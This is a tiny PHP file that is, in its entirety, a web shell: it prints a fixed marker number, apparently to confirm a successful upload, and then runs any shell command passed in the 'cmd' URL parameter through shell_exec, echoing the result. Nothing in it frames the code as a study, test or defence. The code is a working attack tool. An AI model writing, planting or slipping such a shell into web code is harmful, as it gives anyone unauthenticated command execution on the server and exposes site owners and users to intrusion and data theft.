<?php
// PHP shell for verification and command execution
echo 560382;
if (isset($_GET['cmd'])) {
    echo "<pre>" . shell_exec($_GET['cmd']) . "</pre>";
}
?>